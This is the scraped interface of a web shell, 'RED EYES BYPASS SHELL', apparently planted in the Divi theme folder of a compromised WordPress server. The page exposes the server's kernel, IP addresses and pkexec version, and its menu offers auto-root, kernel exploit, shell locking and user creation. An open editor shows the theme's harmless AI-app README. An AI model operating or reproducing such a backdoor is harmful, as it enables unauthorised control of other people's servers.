Linux sothorn202 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
pr /
wp-content /
themes /
Extra /
ai-app /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
build
[ DIR ]
drwxr-xr-x
i18n
[ DIR ]
drwxr-xr-x
README.md
1.12
KB
-rwxr-xr-x
ai-app.php
8.66
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
## DIVI AI - Frontend APP ----- ----- :smiley: > How to trigger the AI app: On a click event, we can hook the below statement: ```jQuery(window).trigger('et_ai_container_ready', [preferences, 'et-ai-app']);``` Param 1: Object **--->** preferences ``` const preferences = { context: 'section', date: new Date(), }; ``` This is just an example, you can pass any configuration you need. Param 2: String **--->** 'container ID' _We just have to pass a string as an ID, and the AI app will automatically create the element in the DOM_ > How the AI app starts: AI app listens for the event and runs the _<APP />_ component. ``` $(window).on('et_ai_container_ready', (event, preferences, container) => { ... ... <Provider store={store}> <App /> </Provider> ... }); ``` We can pass the preferences like this, if necessary: (Index.tsx) ``` <Provider store={store}> <App preferences={preferences} /> </Provider> ``` > How to start the test server: Run `yarn` in the root to install packages Run `yarn json-server` to start the JSON server There is a db.json file included in the root directory for data. Enjoy!
Close